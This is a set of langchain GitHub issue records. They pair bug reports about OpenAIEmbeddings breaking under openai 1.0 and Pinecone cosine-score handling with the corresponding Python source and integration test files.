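        "openai>=1.0 is installed, but this LangChain version needs "
        "openai<1.0. Pin it with: pip install openai==0.28.1"
    )

from langchain.embeddings import OpenAIEmbeddings

embeddings = OpenAIEmbeddings()  # now constructs without the AttributeError
```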
https://github.com/langchain-ai/langchain/issues/12943
https://github.com/langchain-ai/langchain/pull/12969
fdbb45d79e69485e0892dadf48b32dc8efadde9b
0c81cd923e04bb68fdf3ad299946d7fa85a21f9f
"2023-11-06T17:56:29Z"
python
"2023-11-07T02:52:33Z"
libs/langchain/langchain/embeddings/openai.py
from __future__ import annotations import logging import warnings from typing import ( Any, Callable, Dict, List, Literal, Optional, Sequence, Set, Tuple, Union, ) import numpy as np from tenacity import ( AsyncRetrying, before_sleep_log, retry, retry_if_exception_type, stop_after_attempt, wait_exponential, ) from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator from langchain.schema.embeddings import Embeddings from langchain.utils import get_from_dict_or_env, get_pydantic_field_names logger = logging.getLogger(__name__) def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards return retry( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards async_retrying = AsyncRetrying( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def wrap(func: Callable) -> Callable: async def wrapped_f(*args: Any, **kwargs: Any) -> Callable: async for _ in async_retrying: return await func(*args, **kwargs) raise AssertionError("this is unreachable") return wrapped_f return wrap # https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings def _check_response(response: dict, skip_empty: bool = False) -> dict: if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty: import openai raise openai.error.APIError("OpenAI API returned an empty embedding") return response def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" retry_decorator = _create_retry_decorator(embeddings) @retry_decorator def _embed_with_retry(**kwargs: Any) -> Any: response = embeddings.client.create(**kwargs) return _check_response(response, skip_empty=embeddings.skip_empty) return _embed_with_retry(**kwargs) async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" @_async_retry_decorator(embeddings) async def _async_embed_with_retry(**kwargs: Any) -> Any: response = await embeddings.client.acreate(**kwargs) return _check_response(response, skip_empty=embeddings.skip_empty) return await _async_embed_with_retry(**kwargs) class OpenAIEmbeddings(BaseModel, Embeddings): """OpenAI embedding models. 
To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key or pass it as a named parameter to the constructor. Example: .. code-block:: python from langchain.embeddings import OpenAIEmbeddings openai = OpenAIEmbeddings(openai_api_key="my-api-key") In order to use the library with Microsoft Azure endpoints, you need to set the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION. The OPENAI_API_TYPE must be set to 'azure' and the others correspond to the properties of your endpoint. In addition, the deployment name must be passed as the model parameter. Example: .. code-block:: python import os os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/" os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key" os.environ["OPENAI_API_VERSION"] = "2023-05-15" os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080" from langchain.embeddings.openai import OpenAIEmbeddings embeddings = OpenAIEmbeddings( deployment="your-embeddings-deployment-name", model="your-embeddings-model-name", openai_api_base="https://your-endpoint.openai.azure.com/", openai_api_type="azure", ) text = "This is a test query." query_result = embeddings.embed_query(text) """ client: Any = None #: :meta private: model: str = "text-embedding-ada-002" deployment: str = model # to support Azure OpenAI Service custom deployment names openai_api_version: Optional[str] = None # to support Azure OpenAI Service custom endpoints openai_api_base: Optional[str] = None # to support Azure OpenAI Service custom endpoints openai_api_type: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None embedding_ctx_length: int = 8191 """The maximum number of tokens to embed at once.""" openai_api_key: Optional[str] = None openai_organization: Optional[str] = None allowed_special: Union[Literal["all"], Set[str]] = set() disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all" chunk_size: int = 1000 """Maximum number of texts to embed in each batch""" max_retries: int = 6 """Maximum number of retries to make when generating.""" request_timeout: Optional[Union[float, Tuple[float, float]]] = None """Timeout in seconds for the OpenAPI request.""" headers: Any = None tiktoken_model_name: Optional[str] = None """The model name to pass to tiktoken when using this class. Tiktoken is used to count the number of tokens in documents to constrain them to be under a certain limit. By default, when set to None, this will be the same as the embedding model name. However, there are some cases where you may want to use this Embedding class with a model name not supported by tiktoken. This can include when using Azure embeddings or when using one of the many model providers that expose an OpenAI-like API but with different models. In those cases, in order to avoid erroring when tiktoken is called, you can specify a model name to use here.""" show_progress_bar: bool = False """Whether to show a progress bar when embedding.""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" skip_empty: bool = False """Whether to skip empty strings when embedding or raise an error. 
Defaults to not skipping.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = get_pydantic_field_names(cls) extra = values.get("model_kwargs", {}) for field_name in list(values): if field_name in extra: raise ValueError(f"Found {field_name} supplied twice.") if field_name not in all_required_field_names: warnings.warn( f"""WARNING! {field_name} is not default parameter. {field_name} was transferred to model_kwargs. Please confirm that {field_name} is what you intended.""" ) extra[field_name] = values.pop(field_name) invalid_model_kwargs = all_required_field_names.intersection(extra.keys()) if invalid_model_kwargs: raise ValueError( f"Parameters {invalid_model_kwargs} should be specified explicitly. " f"Instead they were passed in as part of `model_kwargs` parameter." ) values["model_kwargs"] = extra return values @root_validator(pre=True) def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", default="", ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) if values["openai_api_type"] in ("azure", "azure_ad", "azuread"): default_api_version = "2022-12-01" # Azure OpenAI embedding models allow a maximum of 16 texts # at a time in each batch # See: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference#embeddings default_chunk_size = 16 else: default_api_version = "" default_chunk_size = 1000 values["openai_api_version"] = get_from_dict_or_env( values, "openai_api_version", "OPENAI_API_VERSION", default=default_api_version, ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) if "chunk_size" not in values: values["chunk_size"] = default_chunk_size try: import openai values["client"] = openai.Embedding except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) return values @property def _invocation_params(self) -> Dict: openai_args = { "model": self.model, "request_timeout": self.request_timeout, "headers": self.headers, "api_key": self.openai_api_key, "organization": self.openai_organization, "api_base": self.openai_api_base, "api_type": self.openai_api_type, "api_version": self.openai_api_version, **self.model_kwargs, } if self.openai_api_type in ("azure", "azure_ad", "azuread"): openai_args["engine"] = self.deployment if self.openai_proxy: try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." 
) openai.proxy = { "http": self.openai_proxy, "https": self.openai_proxy, } # type: ignore[assignment] # noqa: E501 return openai_args # please refer to # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb def _get_len_safe_embeddings( self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None ) -> List[List[float]]: embeddings: List[List[float]] = [[] for _ in range(len(texts))] try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to for OpenAIEmbeddings. " "Please install it with `pip install tiktoken`." ) tokens = [] indices = [] model_name = self.tiktoken_model_name or self.model try: encoding = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken.get_encoding(model) for i, text in enumerate(texts): if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") token = encoding.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) for j in range(0, len(token), self.embedding_ctx_length): tokens.append(token[j : j + self.embedding_ctx_length]) indices.append(i) batched_embeddings: List[List[float]] = [] _chunk_size = chunk_size or self.chunk_size if self.show_progress_bar: try: from tqdm.auto import tqdm _iter = tqdm(range(0, len(tokens), _chunk_size)) except ImportError: _iter = range(0, len(tokens), _chunk_size) else: _iter = range(0, len(tokens), _chunk_size) for i in _iter: response = embed_with_retry( self, input=tokens[i : i + _chunk_size], **self._invocation_params, ) batched_embeddings.extend(r["embedding"] for r in response["data"]) results: List[List[List[float]]] = [[] for _ in range(len(texts))] num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))] for i in range(len(indices)): if self.skip_empty and len(batched_embeddings[i]) == 1: continue results[indices[i]].append(batched_embeddings[i]) num_tokens_in_batch[indices[i]].append(len(tokens[i])) for i in range(len(texts)): _result = results[i] if len(_result) == 0: average = embed_with_retry( self, input="", **self._invocation_params, )["data"][0]["embedding"] else: average = np.average(_result, axis=0, weights=num_tokens_in_batch[i]) embeddings[i] = (average / np.linalg.norm(average)).tolist() return embeddings # please refer to # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb async def _aget_len_safe_embeddings( self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None ) -> List[List[float]]: embeddings: List[List[float]] = [[] for _ in range(len(texts))] try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to for OpenAIEmbeddings. " "Please install it with `pip install tiktoken`." ) tokens = [] indices = [] model_name = self.tiktoken_model_name or self.model try: encoding = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. 
Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken.get_encoding(model) for i, text in enumerate(texts): if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") token = encoding.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) for j in range(0, len(token), self.embedding_ctx_length): tokens.append(token[j : j + self.embedding_ctx_length]) indices.append(i) batched_embeddings: List[List[float]] = [] _chunk_size = chunk_size or self.chunk_size for i in range(0, len(tokens), _chunk_size): response = await async_embed_with_retry( self, input=tokens[i : i + _chunk_size], **self._invocation_params, ) batched_embeddings.extend(r["embedding"] for r in response["data"]) results: List[List[List[float]]] = [[] for _ in range(len(texts))] num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))] for i in range(len(indices)): results[indices[i]].append(batched_embeddings[i]) num_tokens_in_batch[indices[i]].append(len(tokens[i])) for i in range(len(texts)): _result = results[i] if len(_result) == 0: average = ( await async_embed_with_retry( self, input="", **self._invocation_params, ) )["data"][0]["embedding"] else: average = np.average(_result, axis=0, weights=num_tokens_in_batch[i]) embeddings[i] = (average / np.linalg.norm(average)).tolist() return embeddings def embed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to OpenAI's embedding endpoint for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # NOTE: to keep things simple, we assume the list may contain texts longer # than the maximum context and use length-safe embedding function. return self._get_len_safe_embeddings(texts, engine=self.deployment) async def aembed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to OpenAI's embedding endpoint async for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # NOTE: to keep things simple, we assume the list may contain texts longer # than the maximum context and use length-safe embedding function. return await self._aget_len_safe_embeddings(texts, engine=self.deployment) def embed_query(self, text: str) -> List[float]: """Call out to OpenAI's embedding endpoint for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ return self.embed_documents([text])[0] async def aembed_query(self, text: str) -> List[float]: """Call out to OpenAI's embedding endpoint async for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ embeddings = await self.aembed_documents([text]) return embeddings[0]
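For reference, the intended happy path for the class above (with a compatible `openai<1.0` install) follows its own docstring; a minimal sketch:

```python
from langchain.embeddings import OpenAIEmbeddings

# Assumes OPENAI_API_KEY is set in the environment
# (or pass openai_api_key="..." explicitly).
embeddings = OpenAIEmbeddings(model="text-embedding-ada-002")

query_vector = embeddings.embed_query("What is LangChain?")
doc_vectors = embeddings.embed_documents(["first document", "second document"])

print(len(query_vector))  # 1536 dimensions for text-embedding-ada-002
print(len(doc_vectors))   # one vector per input text
```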
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,943
OpenAIEmbeddings() does not work because of these bugs
### System Info Python Version: 3.11 LangChain Version: 0.0.331 OpenAI Version: 1.0.0 ### Who can help? @hwchase17, @agola11, @eyurtsev ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction The following error is caused by the recent upgrade of the OpenAI package to 1.0.0. **Use openai==0.28.1 to work around it.** With the code `embeddings = OpenAIEmbeddings()`, the error produced is: `AttributeError: module 'openai' has no attribute 'Embedding'. Did you mean: 'embeddings'?` I went through the `langchain/embeddings/openai.py` file and changed `value["client"] = openai.Embedding` to `value["client"] = openai.embeddings`, but then I received this new error: `AttributeError: module 'openai' has no attribute 'error'` in the same file (`langchain/embeddings/openai.py`). ### Expected behavior The call should succeed without an error.
https://github.com/langchain-ai/langchain/issues/12943
https://github.com/langchain-ai/langchain/pull/12969
fdbb45d79e69485e0892dadf48b32dc8efadde9b
0c81cd923e04bb68fdf3ad299946d7fa85a21f9f
"2023-11-06T17:56:29Z"
python
"2023-11-07T02:52:33Z"
libs/langchain/tests/integration_tests/embeddings/test_openai.py
"""Test openai embeddings.""" import os import numpy as np import openai import pytest from langchain.embeddings.openai import OpenAIEmbeddings @pytest.mark.scheduled def test_openai_embedding_documents() -> None: """Test openai embeddings.""" documents = ["foo bar"] embedding = OpenAIEmbeddings() output = embedding.embed_documents(documents) assert len(output) == 1 assert len(output[0]) == 1536 @pytest.mark.scheduled def test_openai_embedding_documents_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = OpenAIEmbeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = embedding.embed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 @pytest.mark.scheduled @pytest.mark.asyncio async def test_openai_embedding_documents_async_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = OpenAIEmbeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = await embedding.aembed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 @pytest.mark.scheduled def test_openai_embedding_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = OpenAIEmbeddings() output = embedding.embed_query(document) assert len(output) == 1536 @pytest.mark.scheduled @pytest.mark.asyncio async def test_openai_embedding_async_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = OpenAIEmbeddings() output = await embedding.aembed_query(document) assert len(output) == 1536 @pytest.mark.skip(reason="Unblock scheduled testing. TODO: fix.") @pytest.mark.scheduled def test_openai_embedding_with_empty_string() -> None: """Test openai embeddings with empty string.""" document = ["", "abc"] embedding = OpenAIEmbeddings() output = embedding.embed_documents(document) assert len(output) == 2 assert len(output[0]) == 1536 expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[ "data" ][0]["embedding"] assert np.allclose(output[0], expected_output) assert len(output[1]) == 1536 @pytest.mark.scheduled def test_embed_documents_normalized() -> None: output = OpenAIEmbeddings().embed_documents(["foo walked to the market"]) assert np.isclose(np.linalg.norm(output[0]), 1.0) @pytest.mark.scheduled def test_embed_query_normalized() -> None: output = OpenAIEmbeddings().embed_query("foo walked to the market") assert np.isclose(np.linalg.norm(output), 1.0) def test_azure_openai_embeddings() -> None: from openai import error os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_BASE"] = "https://your-endpoint.openai.azure.com/" os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key" os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview" embeddings = OpenAIEmbeddings(deployment="your-embeddings-deployment-name") text = "This is a test document." try: embeddings.embed_query(text) except error.InvalidRequestError as e: if "Must provide an 'engine' or 'deployment_id' parameter" in str(e): assert ( False ), "deployment was provided to but openai.Embeddings didn't get it." except Exception: # Expected to fail because endpoint doesn't exist. pass
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,207
Issue: Pinecone retriever with Cosine Similarity is treated like Cosine Distance
### Issue you'd like to raise. When using document search from an existing Pinecone index that was created using Cosine **Similarity** in the `ConversationalRetrievalChain`, the `score_threshold` would eliminate the most relevant documents instead of the least relevant ones, because the _similarity_ metric is converted to a _distance_. In [_select_relevance_score_fn](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/pinecone.py#L172) it calls [_cosine_relevance_score_fn](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/base.py#L169), which converts the similarity returned from the Pinecone search into a distance. Then, [filtering the documents](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/base.py#L266) based on the `score_threshold` eliminates the most relevant documents instead of the least relevant ones. ### Suggestion: The Pinecone subclass should override `_cosine_relevance_score_fn` to preserve the similarity, since that is what originally comes back from the Pinecone similarity search (see the sketch after this record's file content below).
https://github.com/langchain-ai/langchain/issues/8207
https://github.com/langchain-ai/langchain/pull/8920
2e42ed5de68d27fe0ce676aae0cdaae778fcf16c
ff19a62afc2c8d6d9e705bd0af5ffad426263f49
"2023-07-24T22:23:33Z"
python
"2023-11-13T19:47:38Z"
libs/langchain/langchain/vectorstores/pinecone.py
from __future__ import annotations import logging import uuid import warnings from typing import TYPE_CHECKING, Any, Callable, Iterable, List, Optional, Tuple, Union import numpy as np from langchain.docstore.document import Document from langchain.schema.embeddings import Embeddings from langchain.schema.vectorstore import VectorStore from langchain.utils.iter import batch_iterate from langchain.vectorstores.utils import DistanceStrategy, maximal_marginal_relevance if TYPE_CHECKING: from pinecone import Index logger = logging.getLogger(__name__) class Pinecone(VectorStore): """`Pinecone` vector store. To use, you should have the ``pinecone-client`` python package installed. Example: .. code-block:: python from langchain.vectorstores import Pinecone from langchain.embeddings.openai import OpenAIEmbeddings import pinecone # The environment should be the one specified next to the API key # in your Pinecone console pinecone.init(api_key="***", environment="...") index = pinecone.Index("langchain-demo") embeddings = OpenAIEmbeddings() vectorstore = Pinecone(index, embeddings.embed_query, "text") """ def __init__( self, index: Any, embedding: Union[Embeddings, Callable], text_key: str, namespace: Optional[str] = None, distance_strategy: Optional[DistanceStrategy] = DistanceStrategy.COSINE, ): """Initialize with Pinecone client.""" try: import pinecone except ImportError: raise ImportError( "Could not import pinecone python package. " "Please install it with `pip install pinecone-client`." ) if not isinstance(embedding, Embeddings): warnings.warn( "Passing in `embedding` as a Callable is deprecated. Please pass in an" " Embeddings object instead." ) if not isinstance(index, pinecone.index.Index): raise ValueError( f"client should be an instance of pinecone.index.Index, " f"got {type(index)}" ) self._index = index self._embedding = embedding self._text_key = text_key self._namespace = namespace self.distance_strategy = distance_strategy @property def embeddings(self) -> Optional[Embeddings]: """Access the query embedding object if available.""" if isinstance(self._embedding, Embeddings): return self._embedding return None def _embed_documents(self, texts: Iterable[str]) -> List[List[float]]: """Embed search docs.""" if isinstance(self._embedding, Embeddings): return self._embedding.embed_documents(list(texts)) return [self._embedding(t) for t in texts] def _embed_query(self, text: str) -> List[float]: """Embed query text.""" if isinstance(self._embedding, Embeddings): return self._embedding.embed_query(text) return self._embedding(text) def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, namespace: Optional[str] = None, batch_size: int = 32, embedding_chunk_size: int = 1000, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Upsert optimization is done by chunking the embeddings and upserting them. This is done to avoid memory issues and optimize using HTTP based embeddings. For OpenAI embeddings, use pool_threads>4 when constructing the pinecone.Index, embedding_chunk_size>1000 and batch_size~64 for best performance. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. ids: Optional list of ids to associate with the texts. namespace: Optional pinecone namespace to add the texts to. batch_size: Batch size to use when adding the texts to the vectorstore. 
embedding_chunk_size: Chunk size to use when embedding the texts. Returns: List of ids from adding the texts into the vectorstore. """ if namespace is None: namespace = self._namespace texts = list(texts) ids = ids or [str(uuid.uuid4()) for _ in texts] metadatas = metadatas or [{} for _ in texts] for metadata, text in zip(metadatas, texts): metadata[self._text_key] = text # For loops to avoid memory issues and optimize when using HTTP based embeddings # The first loop runs the embeddings, it benefits when using OpenAI embeddings # The second loops runs the pinecone upsert asynchronously. for i in range(0, len(texts), embedding_chunk_size): chunk_texts = texts[i : i + embedding_chunk_size] chunk_ids = ids[i : i + embedding_chunk_size] chunk_metadatas = metadatas[i : i + embedding_chunk_size] embeddings = self._embed_documents(chunk_texts) async_res = [ self._index.upsert( vectors=batch, namespace=namespace, async_req=True, **kwargs, ) for batch in batch_iterate( batch_size, zip(chunk_ids, embeddings, chunk_metadatas) ) ] [res.get() for res in async_res] return ids def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, ) -> List[Tuple[Document, float]]: """Return pinecone documents most similar to query, along with scores. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter: Dictionary of argument(s) to filter on metadata namespace: Namespace to search in. Default will search in '' namespace. Returns: List of Documents most similar to the query and score for each """ return self.similarity_search_by_vector_with_score( self._embed_query(query), k=k, filter=filter, namespace=namespace ) def similarity_search_by_vector_with_score( self, embedding: List[float], *, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, ) -> List[Tuple[Document, float]]: """Return pinecone documents most similar to embedding, along with scores.""" if namespace is None: namespace = self._namespace docs = [] results = self._index.query( [embedding], top_k=k, include_metadata=True, namespace=namespace, filter=filter, ) for res in results["matches"]: metadata = res["metadata"] if self._text_key in metadata: text = metadata.pop(self._text_key) score = res["score"] docs.append((Document(page_content=text, metadata=metadata), score)) else: logger.warning( f"Found document with no `{self._text_key}` key. Skipping." ) return docs def similarity_search( self, query: str, k: int = 4, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return pinecone documents most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter: Dictionary of argument(s) to filter on metadata namespace: Namespace to search in. Default will search in '' namespace. Returns: List of Documents most similar to the query and score for each """ docs_and_scores = self.similarity_search_with_score( query, k=k, filter=filter, namespace=namespace, **kwargs ) return [doc for doc, _ in docs_and_scores] def _select_relevance_score_fn(self) -> Callable[[float], float]: """ The 'correct' relevance function may differ depending on a few things, including: - the distance / similarity metric used by the VectorStore - the scale of your embeddings (OpenAI's are unit normed. Many others are not!) - embedding dimensionality - etc. 
""" if self.distance_strategy == DistanceStrategy.COSINE: return self._cosine_relevance_score_fn elif self.distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT: return self._max_inner_product_relevance_score_fn elif self.distance_strategy == DistanceStrategy.EUCLIDEAN_DISTANCE: return self._euclidean_relevance_score_fn else: raise ValueError( "Unknown distance strategy, must be cosine, max_inner_product " "(dot product), or euclidean" ) def max_marginal_relevance_search_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: embedding: Embedding to look up documents similar to. k: Number of Documents to return. Defaults to 4. fetch_k: Number of Documents to fetch to pass to MMR algorithm. lambda_mult: Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. Returns: List of Documents selected by maximal marginal relevance. """ if namespace is None: namespace = self._namespace results = self._index.query( [embedding], top_k=fetch_k, include_values=True, include_metadata=True, namespace=namespace, filter=filter, ) mmr_selected = maximal_marginal_relevance( np.array([embedding], dtype=np.float32), [item["values"] for item in results["matches"]], k=k, lambda_mult=lambda_mult, ) selected = [results["matches"][i]["metadata"] for i in mmr_selected] return [ Document(page_content=metadata.pop((self._text_key)), metadata=metadata) for metadata in selected ] def max_marginal_relevance_search( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[dict] = None, namespace: Optional[str] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. fetch_k: Number of Documents to fetch to pass to MMR algorithm. lambda_mult: Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. Returns: List of Documents selected by maximal marginal relevance. """ embedding = self._embed_query(query) return self.max_marginal_relevance_search_by_vector( embedding, k, fetch_k, lambda_mult, filter, namespace ) @classmethod def get_pinecone_index( cls, index_name: Optional[str], pool_threads: int = 4, ) -> Index: """Return a Pinecone Index instance. Args: index_name: Name of the index to use. pool_threads: Number of threads to use for index upsert. Returns: Pinecone Index instance.""" try: import pinecone except ImportError: raise ValueError( "Could not import pinecone python package. " "Please install it with `pip install pinecone-client`." ) indexes = pinecone.list_indexes() # checks if provided index exists if index_name in indexes: index = pinecone.Index(index_name, pool_threads=pool_threads) elif len(indexes) == 0: raise ValueError( "No active indexes found in your Pinecone project, " "are you sure you're using the right Pinecone API key and Environment? " "Please double check your Pinecone dashboard." 
) else: raise ValueError( f"Index '{index_name}' not found in your Pinecone project. " f"Did you mean one of the following indexes: {', '.join(indexes)}" ) return index @classmethod def from_texts( cls, texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, batch_size: int = 32, text_key: str = "text", namespace: Optional[str] = None, index_name: Optional[str] = None, upsert_kwargs: Optional[dict] = None, pool_threads: int = 4, embeddings_chunk_size: int = 1000, **kwargs: Any, ) -> Pinecone: """Construct Pinecone wrapper from raw documents. This is a user friendly interface that: 1. Embeds documents. 2. Adds the documents to a provided Pinecone index This is intended to be a quick way to get started. The `pool_threads` affects the speed of the upsert operations. Example: .. code-block:: python from langchain.vectorstores import Pinecone from langchain.embeddings import OpenAIEmbeddings import pinecone # The environment should be the one specified next to the API key # in your Pinecone console pinecone.init(api_key="***", environment="...") embeddings = OpenAIEmbeddings() pinecone = Pinecone.from_texts( texts, embeddings, index_name="langchain-demo" ) """ pinecone_index = cls.get_pinecone_index(index_name, pool_threads) pinecone = cls(pinecone_index, embedding, text_key, namespace, **kwargs) pinecone.add_texts( texts, metadatas=metadatas, ids=ids, namespace=namespace, batch_size=batch_size, embedding_chunk_size=embeddings_chunk_size, **(upsert_kwargs or {}), ) return pinecone @classmethod def from_existing_index( cls, index_name: str, embedding: Embeddings, text_key: str = "text", namespace: Optional[str] = None, pool_threads: int = 4, ) -> Pinecone: """Load pinecone vectorstore from index name.""" pinecone_index = cls.get_pinecone_index(index_name, pool_threads) return cls(pinecone_index, embedding, text_key, namespace) def delete( self, ids: Optional[List[str]] = None, delete_all: Optional[bool] = None, namespace: Optional[str] = None, filter: Optional[dict] = None, **kwargs: Any, ) -> None: """Delete by vector IDs or filter. Args: ids: List of ids to delete. filter: Dictionary of conditions to filter vectors to delete. """ if namespace is None: namespace = self._namespace if delete_all: self._index.delete(delete_all=True, namespace=namespace, **kwargs) elif ids is not None: chunk_size = 1000 for i in range(0, len(ids), chunk_size): chunk = ids[i : i + chunk_size] self._index.delete(ids=chunk, namespace=namespace, **kwargs) elif filter is not None: self._index.delete(filter=filter, namespace=namespace, **kwargs) else: raise ValueError("Either ids, delete_all, or filter must be provided.") return None
